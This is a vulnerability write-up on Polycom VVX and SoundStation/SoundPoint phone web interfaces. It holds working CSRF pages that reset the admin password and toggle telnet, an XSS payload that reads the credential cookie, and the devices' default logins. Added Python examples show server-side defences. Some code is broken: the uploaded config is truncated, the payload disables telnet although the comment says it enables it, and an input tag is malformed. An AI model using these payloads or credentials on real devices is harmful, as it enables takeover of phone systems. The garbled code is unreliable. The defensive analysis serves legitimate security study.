| Field | Value |
| --- | --- |
| Phone Model | VVX 311 |
| Part Number | 3111-48350-001 Rev:A |
| MAC Address | X |
| IP Mode | IPv4 |
| IP Address | X |
| UC Software Version | 5.9.1.0615 |
| Updater Version | 5.9.7.12459 |
This GUI appears to be similar or identical to the SoundPoint's, and most POST requests appear to be vulnerable to CSRF. I can simply strip out the login/password cookie that is sent with each request and craft a CSRF page. For example, the following CSRF page changes the admin password and turns on telnet. This works on the VVX model; however, the same CSRF did not work on the SoundStation and SoundPoint.
```html
<html>
  <!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
      xhr.withCredentials = true;
      var body = "-----------------------------402251386101268401375671906\r\n" +
        "Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "\x3cdevice device.set=\"1\"\x3e\n" +
        "\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" +
        "\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" +
        "\r\n" +
        "-----------------------------402251386101268401375671906--\r\n";
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
      xhr.send(new Blob([aBody]));
    }
  </script>
  <form action="#">
    <input type="button" value="Submit request" onclick="submitRequest();" />
  </form>
  </body>
</html>
```

This sends a file called polycomtelnet.cfg, which basically looks like this:

```xml
<device device.set="1">
<auth device.auth.
<telnet diags.telnetd.enabled="0"></
```
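The request above goes through because the phone's web UI accepts any cookie-authenticated POST, no matter which page issued it: the browser attaches the `Authorization` cookie to the cross-site XHR (`withCredentials = true`) and nothing on the server ties the request to the admin UI itself. The following is an added example, not Polycom code, of the server-side guard that blocks this class of request: the browser-supplied `Origin` (or `Referer`) must match the device's own origin, and every state-changing request must carry an unpredictable per-session token that a cross-site page cannot read. The allowed origin, the `X-CSRF-Token` header name and all request headers below are constructed for the demonstration.

```python
"""Server-side CSRF guard for a cookie-authenticated admin web UI.

Added example, not Polycom code: it models the defence a device web UI
needs against the cross-origin multipart POST shown above. Every request
below is constructed for the demonstration.
"""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Origins from which the admin UI may legitimately submit forms (assumed value).
ALLOWED_ORIGINS = {"https://phone.example.internal"}
# Hypothetical header the admin UI's own JavaScript uses to send the token.
TOKEN_HEADER = "x-csrf-token"


def issue_csrf_token() -> str:
    """Generate an unpredictable per-session token to embed in each admin form."""
    return secrets.token_urlsafe(32)


def _origin_of(headers: Dict[str, str]) -> Optional[str]:
    """Effective origin of the request: Origin header first, else the Referer's origin."""
    origin = headers.get("origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def is_state_changing(method: str) -> bool:
    """Only non-safe methods need CSRF protection."""
    return method.upper() not in {"GET", "HEAD", "OPTIONS"}


def check_request(method: str, headers: Dict[str, str], session_token: str) -> Tuple[bool, str]:
    """Decide whether a state-changing request may proceed.

    Two independent checks: the browser-supplied Origin/Referer must be an
    allowed origin, and the request must carry the session's CSRF token
    (compared in constant time). A cookie-only request, like the PoC's
    withCredentials XHR, fails both.
    """
    if not is_state_changing(method):
        return True, "safe method"
    hdrs = {k.lower(): v for k, v in headers.items()}
    origin = _origin_of(hdrs)
    if origin is None:
        return False, "missing Origin/Referer on state-changing request"
    if origin not in ALLOWED_ORIGINS:
        return False, f"cross-site origin {origin}"
    supplied = hdrs.get(TOKEN_HEADER, "")
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests. The first mirrors the cross-origin PoC: the cookie is
# sent, no token is present, and the browser set Origin to the hosting page.
SESSION_TOKEN = issue_csrf_token()
CROSS_SITE_POST = {
    "Origin": "https://attacker.example",
    "Cookie": "Authorization=PLACEHOLDER",  # constructed, not a real cookie value
    "Content-Type": "multipart/form-data; boundary=----example",
}
LEGIT_POST = {
    "Origin": "https://phone.example.internal",
    "Cookie": "Authorization=PLACEHOLDER",
    "X-CSRF-Token": SESSION_TOKEN,
}

if __name__ == "__main__":
    for name, hdrs in (("cross-site", CROSS_SITE_POST), ("legitimate", LEGIT_POST)):
        ok, why = check_request("POST", hdrs, SESSION_TOKEN)
        print(f"{name}: {'allow' if ok else 'block'} ({why})")
```

The origin check alone would already stop the page above, since a browser always sets `Origin` on a cross-site XHR POST; the token is the second layer for clients or proxies that strip `Origin` and `Referer`, which the guard treats as a failure rather than a pass.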
| Field | Value |
| --- | --- |
| Phone Model | SoundStation IP 5000 & SoundPoint IP 335 (same firmware) |
| Part Number | 3111-30900-001 Rev:H |
| MAC Address | X |
| IP Address | X |
| UC Software Version | 4.0.14.1388 |
| BootROM Software Version | 5.0.14.0580 |
This is a POST XSS via CSRF to which the newest firmware of both the SoundStation and the SoundPoint is vulnerable. Given the simple `Cookie: Authorization=` header, having the cookies exposed makes this easy to convert from base64.
```html
<html>
  <!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388 -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://192.168.128.17/form-submit" method="POST">
    <input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" />
    <input type="submit" value="Submit request" />
  </form>
  </body>
</html>
```
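The payload in field `250:1` works because the GUI reflects the submitted value back into an HTML attribute verbatim: the leading `">` closes the attribute and the `<Script>` that follows runs with access to `document.cookie`, which on this firmware holds the base64 credentials. The following is an added example, not Polycom code, showing the vulnerable rendering beside the hardened one and the cookie flags that limit the damage even if a reflection is missed. The field name and payload are taken from the PoC above; the surrounding `<input>` markup and the cookie flags are assumptions about how a fixed UI would render.

```python
"""Reflecting an admin form field safely, and issuing the auth cookie so that
script cannot read it. Added example, not Polycom code. The field name
"250:1" and the payload come from the PoC above; the markup is assumed.
"""
import html
import re

# The PoC's injected value: closes value="..." then injects a script element.
PAYLOAD = '"><Script>alert(document.cookie)</Script>'

_SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def render_unsafe(field: str, value: str) -> str:
    """How a vulnerable page reflects the submitted value: verbatim into the attribute."""
    return f'<input type="text" name="{field}" value="{value}">'


def render_safe(field: str, value: str) -> str:
    """Escape <, >, &, ' and " so the value stays a plain attribute string."""
    safe_field = html.escape(field, quote=True)
    safe_value = html.escape(value, quote=True)
    return f'<input type="text" name="{safe_field}" value="{safe_value}">'


def contains_live_script(markup: str) -> bool:
    """Demonstration check only: does an unescaped <script tag survive rendering?"""
    return _SCRIPT_TAG.search(markup) is not None


def auth_cookie_header(name: str, value: str) -> str:
    """Set-Cookie line for the session cookie with the flags that blunt this XSS.

    HttpOnly keeps document.cookie from reading it, SameSite=Strict stops the
    browser attaching it to a cross-site form POST like the one above, and
    Secure keeps it off plain HTTP. (Assumed policy for a hardened UI.)
    """
    return f"Set-Cookie: {name}={value}; Secure; HttpOnly; SameSite=Strict; Path=/"


if __name__ == "__main__":
    print("unsafe:", render_unsafe("250:1", PAYLOAD))
    print("safe:  ", render_safe("250:1", PAYLOAD))
    print(auth_cookie_header("Authorization", "PLACEHOLDER"))  # constructed value
```

Attribute escaping is the fix for the reflection itself; the cookie flags are defence in depth, since with `HttpOnly` set the `alert(document.cookie)` in the PoC would show nothing even if another reflection were found.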
Most of these devices come with default logins: user/123 and admin/456. However, if the company setting them up has changed the defaults, these CSRF vulnerabilities could be useful.